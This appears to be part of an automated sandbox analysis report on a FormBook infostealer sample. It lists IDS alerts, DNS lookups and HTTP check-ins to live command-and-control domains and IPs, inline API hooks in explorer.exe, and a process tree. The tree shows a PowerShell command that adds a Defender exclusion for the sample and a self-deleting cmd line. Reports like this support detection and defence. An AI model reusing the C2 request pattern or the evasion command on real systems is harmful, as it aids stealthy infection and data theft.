                                                                                                                                                                                                                    .text0x20000xb0c740xb0e005ba4a2c4b75c26bb43235e1cdc3c5170False0.8472435401943463data7.646714228019074IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rsrc0xb40000x5dc0x60014053a073b47d96d5fef0ae638cd3229False0.4388020833333333data4.186995658519555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .reloc0xb60000xc0x2001306fa69cde1f5307f16e32de3dd14d4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                    RT_VERSION0xb40900x34cdata0.4372037914691943
                                                                                                                                                                                                                    RT_MANIFEST0xb43ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-09-30T18:17:01.206547+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649727185.26.122.7080TCP
                                                                                                                                                                                                                    2024-09-30T18:17:01.206547+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649727185.26.122.7080TCP
                                                                                                                                                                                                                    2024-09-30T18:17:01.206547+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649727185.26.122.7080TCP
                                                                                                                                                                                                                    2024-09-30T18:20:05.308366+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649733188.114.96.380TCP
                                                                                                                                                                                                                    2024-09-30T18:20:05.308366+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649733188.114.96.380TCP
                                                                                                                                                                                                                    2024-09-30T18:20:05.308366+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649733188.114.96.380TCP

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.684269905 CEST4972780192.168.2.6185.26.122.70
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.689624071 CEST8049727185.26.122.70192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.689723015 CEST4972780192.168.2.6185.26.122.70
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.691968918 CEST4972780192.168.2.6185.26.122.70
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.698883057 CEST8049727185.26.122.70192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:17:01.201049089 CEST4972780192.168.2.6185.26.122.70
                                                                                                                                                                                                                    Sep 30, 2024 18:17:01.206494093 CEST8049727185.26.122.70192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:17:01.206547022 CEST4972780192.168.2.6185.26.122.70
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.807838917 CEST4973380192.168.2.6188.114.96.3
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.812650919 CEST8049733188.114.96.3192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.813429117 CEST4973380192.168.2.6188.114.96.3
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.813530922 CEST4973380192.168.2.6188.114.96.3
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.818751097 CEST8049733188.114.96.3192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.306699991 CEST8049733188.114.96.3192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.307007074 CEST4973380192.168.2.6188.114.96.3
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.308254004 CEST8049733188.114.96.3192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.308366060 CEST4973380192.168.2.6188.114.96.3
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.311872959 CEST8049733188.114.96.3192.168.2.6

                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Sep 30, 2024 18:16:39.108560085 CEST5740653192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:16:39.199477911 CEST53574061.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.579710007 CEST5790953192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.674328089 CEST53579091.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:17:40.133903027 CEST5136353192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:17:40.143837929 CEST53513631.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:18:00.689377069 CEST6013653192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:18:00.724766016 CEST53601361.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:18:21.201798916 CEST5153153192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:18:21.216984034 CEST53515311.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:18:41.714139938 CEST5707653192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:18:41.724505901 CEST53570761.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:19:02.626411915 CEST5116353192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:19:02.721574068 CEST53511631.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:19:23.086381912 CEST5955853192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:19:23.097445965 CEST53595581.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:19:43.841934919 CEST5682853192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:19:43.873985052 CEST53568281.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.762689114 CEST5794453192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.782607079 CEST53579441.1.1.1192.168.2.6
                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.467030048 CEST5692453192.168.2.61.1.1.1
                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.484256983 CEST53569241.1.1.1192.168.2.6

                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Sep 30, 2024 18:16:39.108560085 CEST192.168.2.61.1.1.10x4cddStandard query (0)www.uijiuw.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.579710007 CEST192.168.2.61.1.1.10x65f2Standard query (0)www.oko.eventsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:17:40.133903027 CEST192.168.2.61.1.1.10x95b0Standard query (0)www.hecreature.techA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:00.689377069 CEST192.168.2.61.1.1.10xd864Standard query (0)www.ealerslot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:21.201798916 CEST192.168.2.61.1.1.10x2a2aStandard query (0)www.aithful.eventsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:41.714139938 CEST192.168.2.61.1.1.10x93e9Standard query (0)www.amilablackwell.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:02.626411915 CEST192.168.2.61.1.1.10x5f03Standard query (0)www.eviewmadu.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:23.086381912 CEST192.168.2.61.1.1.10x3e36Standard query (0)www.khizmetlergirisyapzzz2024.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:43.841934919 CEST192.168.2.61.1.1.10x986dStandard query (0)www.23fd595ig.autosA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.762689114 CEST192.168.2.61.1.1.10x9a2eStandard query (0)www.j88.travelA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.467030048 CEST192.168.2.61.1.1.10xa1a3Standard query (0)www.venir-bienne.infoA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Sep 30, 2024 18:16:39.199477911 CEST1.1.1.1192.168.2.60x4cddName error (3)www.uijiuw.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.674328089 CEST1.1.1.1192.168.2.60x65f2No error (0)www.oko.events185.26.122.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:17:40.143837929 CEST1.1.1.1192.168.2.60x95b0Name error (3)www.hecreature.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:00.724766016 CEST1.1.1.1192.168.2.60xd864Name error (3)www.ealerslot.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:21.216984034 CEST1.1.1.1192.168.2.60x2a2aName error (3)www.aithful.eventsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:18:41.724505901 CEST1.1.1.1192.168.2.60x93e9Name error (3)www.amilablackwell.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:02.721574068 CEST1.1.1.1192.168.2.60x5f03Name error (3)www.eviewmadu.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:23.097445965 CEST1.1.1.1192.168.2.60x3e36Name error (3)www.khizmetlergirisyapzzz2024.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:19:43.873985052 CEST1.1.1.1192.168.2.60x986dName error (3)www.23fd595ig.autosnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.782607079 CEST1.1.1.1192.168.2.60x9a2eNo error (0)www.j88.travel188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.782607079 CEST1.1.1.1192.168.2.60x9a2eNo error (0)www.j88.travel188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Sep 30, 2024 18:20:26.484256983 CEST1.1.1.1192.168.2.60xa1a3Name error (3)www.venir-bienne.infononenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • www.oko.events
                                                                                                                                                                                                                    • www.j88.travel

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.649727185.26.122.70804004C:\Windows\explorer.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 30, 2024 18:17:00.691968918 CEST162OUTGET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1
                                                                                                                                                                                                                    Host: www.oko.events
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.649733188.114.96.3804004C:\Windows\explorer.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 30, 2024 18:20:04.813530922 CEST162OUTGET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1
                                                                                                                                                                                                                    Host: www.j88.travel
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    Sep 30, 2024 18:20:05.306699991 CEST925INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:05 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                    Expires: Mon, 30 Sep 2024 17:20:05 GMT
                                                                                                                                                                                                                    Location: https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dtQZ0n1Te09ZkD2spq2aiE3h3PUQxrmvY%2BsttoWPNruT2ecTboh6HC%2BbK89TtwwjWuaqhIIB1Cmqqei%2B3kl8RJvawnPt5PzSzJ3AKOjWgWIgF6tWpehHBIX%2BUSn82AwZUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cb589ccb8fd8cd6-EWR
                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                                    User Modules

                                                                                                                                                                                                                    Hook Summary

                                                                                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                                                    GetMessageWINLINEexplorer.exe
                                                                                                                                                                                                                    GetMessageAINLINEexplorer.exe

                                                                                                                                                                                                                    Processes

                                                                                                                                                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xED
                                                                                                                                                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xED
                                                                                                                                                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xED
                                                                                                                                                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xED

                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:12:16:00
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\docs.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0xac0000
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5 hash:136DCC6497B13FE87BBAD4AA5F859593
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0xd60000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:12:16:01
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\docs.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0x4d0000
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5 hash:136DCC6497B13FE87BBAD4AA5F859593
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                    Start time:12:16:02
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                    Imagebase:0x7ff609140000
                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:12:16:04
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                    Imagebase:0x7ff717f30000
                                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:12:16:06
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                                                                                                                                    Imagebase:0x580000
                                                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:12:16:09
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:12:16:09
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

